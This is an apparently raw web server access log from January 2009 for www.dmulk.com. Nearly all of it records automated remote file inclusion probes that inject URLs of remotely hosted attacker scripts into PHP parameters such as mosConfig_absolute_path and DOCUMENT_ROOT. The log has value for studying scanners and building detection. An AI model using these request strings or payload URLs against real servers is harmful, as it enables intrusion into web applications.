212.34.140.136 - - [04/Jan/2009:08:21:32 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:21:35 -0800] "GET /logs/access_071214.log/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:21:38 -0800] "GET /?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 95022 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:21:48 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.234.201.76 - - [04/Jan/2009:08:21:51 -0800] "GET /logs/access_080108.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:21:53 -0800] "GET /logs/access_080901.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:21:55 -0800] "GET /logs/?_zb_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 200 80886 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:22:07 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:07 -0800] "GET /logs/access_080827.log///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:07 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:08 -0800] "GET /logs///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:08 -0800] "GET /logs/access_080809.log///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.3.25.99 - - [04/Jan/2009:08:22:14 -0800] "GET /logs/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.3.25.99 - - [04/Jan/2009:08:22:14 -0800] "GET /logs/access_080404.log/index.php?redir=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:22:15 -0800] "GET /logs/access_081130.log//galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:22:15 -0800] "GET /galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:22:15 -0800] "GET /logs//galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.41.90.11 - - [04/Jan/2009:08:22:17 -0800] "GET /logs/access_071223.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:22:19 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:19 -0800] "GET /logs/access_080506.log///auto.php?inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:20 -0800] "GET //auto.php?inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:22:20 -0800] "GET /logs///auto.php?inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:22:32 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:22:32 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:22:32 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:22:32 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:22:43 -0800] "GET //atom.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.200 - - [04/Jan/2009:08:22:45 -0800] "GET /logs/access_081112.log//galeria.php?start=0&kategoria=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:08:22:53 -0800] "GET /retreat1/webcam/ HTTP/1.1" 200 2596926 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:01 -0800] "GET /logs/access_080211.log/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:02 -0800] "GET /index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:03 -0800] "GET /logs/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:05 -0800] "GET /logs/access_080211.log/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:05 -0800] "GET /index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:06 -0800] "GET /logs/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:06 -0800] "GET /logs/access_080322.log/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:09 -0800] "GET /logs/access_080322.log/index2.php?x=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:23:26 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:23:26 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:23:26 -0800] "GET /logs/access_080810.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:27 -0800] "GET /logs/access_081110.log/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:27 -0800] "GET /index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:27 -0800] "GET /logs/access_081110.log/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:28 -0800] "GET /logs/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:28 -0800] "GET /index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:23:28 -0800] "GET /logs/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:23:31 -0800] "GET /logs/access_081013.log///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:23:31 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:23:32 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:23:32 -0800] "GET /logs/access_080609.log///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:23:34 -0800] "GET /logs/access_080720.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:37 -0800] "GET /logs/access_081027.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:37 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:37 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:39 -0800] "GET /logs/access_081027.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:39 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:23:39 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:23:40 -0800] "GET /logs/access_081013.log///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:23:40 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:23:41 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:23:41 -0800] "GET /logs/access_080609.log///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:23:42 -0800] "GET /logs/access_080722.log///announcements.php?phpraid_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:23:42 -0800] "GET //announcements.php?phpraid_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:23:42 -0800] "GET /logs///announcements.php?phpraid_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:23:54 -0800] "GET /logs/access_080616.log//index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:23:54 -0800] "GET /logs//index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:23:58 -0800] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.101.145.110 - - [04/Jan/2009:08:23:59 -0800] "GET /?_zb_path=http://newdwinsk.ru/ids.txt?? HTTP/1.1" 200 94616 "-" "libwww-perl/5.814" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:24:01 -0800] "GET /index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 200 94766 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:24:05 -0800] "GET /logs/access_081206.log//index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:24:06 -0800] "GET /logs/access_080228.log//index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:24:10 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:24:10 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:24:16 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:24:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:24:16 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:24:18 -0800] "GET /logs/access_081027.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:24:18 -0800] "GET //e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:24:18 -0800] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:24:31 -0800] "GET /logs///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:24:31 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:24:33 -0800] "GET /logs/access_080901.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:24:44 -0800] "GET /logs/access_080401.log/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:24:44 -0800] "GET /errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:24:44 -0800] "GET /logs/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:24:44 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:24:44 -0800] "GET /logs/access_080127.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:24:48 -0800] "GET /logs/access_080530.log//index.php?abs_path=http://dewa.yourfreehosting.net/felcom/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:24:48 -0800] "GET /logs/access_080901.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:25:08 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:25:08 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:25:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:25:09 -0800] "GET /logs/access_080111.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:25:11 -0800] "GET /logs/access_080914.log//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:25:17 -0800] "GET /index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 200 95062 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:25:19 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:25:20 -0800] "GET /logs///calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:25:22 -0800] "GET //calendar.php?l=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:25:32 -0800] "GET /logs/index.php3?p=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:25:33 -0800] "GET /index.php3?p=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:25:40 -0800] "GET /logs/index2.php?i=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:25:40 -0800] "GET /index2.php?i=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:25:41 -0800] "GET /logs/access_080802.log//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
63.247.65.114 - - [04/Jan/2009:08:25:42 -0800] "GET /logs/access_080901.log///e404.php?DOCUMENT_ROOT=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:25:44 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:25:44 -0800] "GET /logs/access_080810.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:25:44 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:25:46 -0800] "GET /logs/access_080511.log/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:25:51 -0800] "GET /logs/access_080720.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:25:53 -0800] "GET /logs/access_080530.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
